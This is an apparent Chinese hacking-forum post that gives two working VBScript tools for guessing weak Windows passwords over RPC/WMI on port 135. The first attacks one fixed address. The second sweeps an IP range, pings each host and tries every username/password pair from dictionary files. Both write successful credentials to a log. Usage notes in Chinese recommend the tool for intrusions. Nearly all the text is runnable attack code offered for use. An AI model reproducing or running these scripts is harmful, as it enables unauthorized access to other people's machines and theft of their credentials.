135端口扫弱口令的vbs（（效率低下）） 's

作者：lcx
来源：vbs小铺

On Error Resume Next set fso=CreateObject("Scripting.FileSystemObject")  Function     filenumshow(filename,i) Dim     temparray if     not     fso.fileExists(filename)     then     exit     Function set     f     =     fso.opentextfile(filename,1) if     not     f.AtEndofStream     then tempcnt     =     f.readall temparray     =     split(tempcnt,chr(13)&chr(10)) filenumshow=temparray(i) f.close End     if End     Function  Function     filenum(filename) Dim     temparray if     not     fso.fileExists(filename)     then     exit     Function set     f     =     fso.opentextfile(filename,1) if     not     f.AtEndofStream     then tempcnt     =     f.readall temparray     =     split(tempcnt,chr(13)&chr(10)) lineNum=ubound(temparray) filenum=lineNum f.close End     if End     Function  For i=0 To filenum("c:/user.txt") user=filenumshow("c:/user.txt",i) If user="" Then Exit for For l=0 To     filenum("c:/pass.txt") pass=filenumshow("c:/pass.txt",l) wscript.echo user&Space(5)&pass Call Scan("192.168.8.10",user,pass,"c:/log.txt") If Err.number=0 Then wscript.echo "find!!!" Exit For End if wscript.echo Err.number&Space(10)&Err.source&Space(10)&Err.Description Err.clear next Next  Sub Scan(ipaddress,username,password,report) set objlocator=createobject("wbemscripting.swbemlocator") set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password) Set colItems = objswbemservices.ExecQuery("Select * From Win32_OperatingSystem") with fso.opentextfile(report,8,true) .writeline "===================================================" For Each objItem in ColItems .writeline ipaddress & ": " & objItem.Caption Next .writeline "username:"&username .writeline "password:"&password .writeline "===================================================" .close end with end Sub set fso=nothing  ++++++++++++++++++++++++++++++++++++++++++++++++++++++  Enjoy Penetration Testing  on error resume next  if (lcase(right(wscript.fullname,11))="wscript.exe") then wscript.echo "Execute it under the cmd.exe Plz! Thx." wscript.quit end if if wscript.arguments.count<5 Then wscript.echo "RPC_Scan.vbs" wscript.echo "Code by NetPatch(www.icehack.com) 07.7.5" wscript.echo "Thx KVO,Lcx" wscript.echo "use: cscript "&wscript.scriptfullname&" Begin_Ip End_Ip User_dic Pass_dic Report_Path" wscript.quit end if  Begin_IP=wscript.arguments(0) End_IP=wscript.arguments(1) User_Dic=wscript.arguments(2) Pass_Dic=wscript.arguments(3) Report_Path=wscript.arguments(4) S_Ip = Split(Begin_Ip, ".", -1, 1) E_Ip =Split(End_Ip, ".", -1, 1) If S_Ip(0) = E_Ip(0) And S_Ip(1) = E_Ip(1) And S_Ip(2) = E_Ip(2) And CInt(S_Ip(3)) <= CInt(E_Ip(3)) And CInt(E_Ip(3)) < 255 Then SE_Ip=S_Ip(0)&"."&S_Ip(1)&"."&S_Ip(2) Set objPings = GetObject("winmgmts:{impersonationLevel=impersonate}") set objlocator=createobject("wbemscripting.swbemlocator")  For num=CInt(S_Ip(3)) To CInt(E_Ip(3)) aMachines = SE_Ip&"."&num  Set objPing=objPings._ ExecQuery("select * from Win32_PingStatus where address = '"_ & aMachines & "'") For Each objStatus in objPing If IsNull(objStatus.StatusCode) or objStatus.StatusCode = 0 Then If user_dic <> "" Or pass_dic <> "" Then set fso=CreateObject("Scripting.FileSystemObject") Set file=fso.opentextfile(User_Dic,1,false) ok=false do while file.atendofline <> True user_dic=file.readline Set files=fso.opentextfile(Pass_Dic,1,false) do while files.atendofline <> True pass_dic=files.readline wscript.echo "Conneting "&aMachines&"...." wscript.echo "user:"&user_dic wscript.echo "pass:"&pass_dic call Scan(aMachines,User_Dic,Pass_Dic,Report_Path) If Err.Number = 0 Then Exit Do Err.clear Loop files.close Loop file.close set fso=nothing End If Else WScript.Echo(aMachines & " is not reachable") End If Next Next End if  Sub Scan(ipaddress,username,password,report) set objWservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password) Set colItems = objWservices.ExecQuery _ ("Select * From Win32_OperatingSystem") with fso.opentextfile(report,8,true) .writeline "===================================================" For Each objItem in ColItems .writeline ipaddress & ": " & objItem.Caption Next .writeline "username:"&username .writeline "password:"&password .writeline "===================================================" .close end with end sub

用法:
cscript RPC_Scan.vbs Begin_Ip End_Ip User_dic Pass_dic Report_Path
Begin_Ip //开始IP
End_Ip //结束IP
User_dic//用户列表
Pass_dic//密码档
Report_Path//输出报告路径

利用RPC(135端口进行密码猜解)
//渗透时比较好使.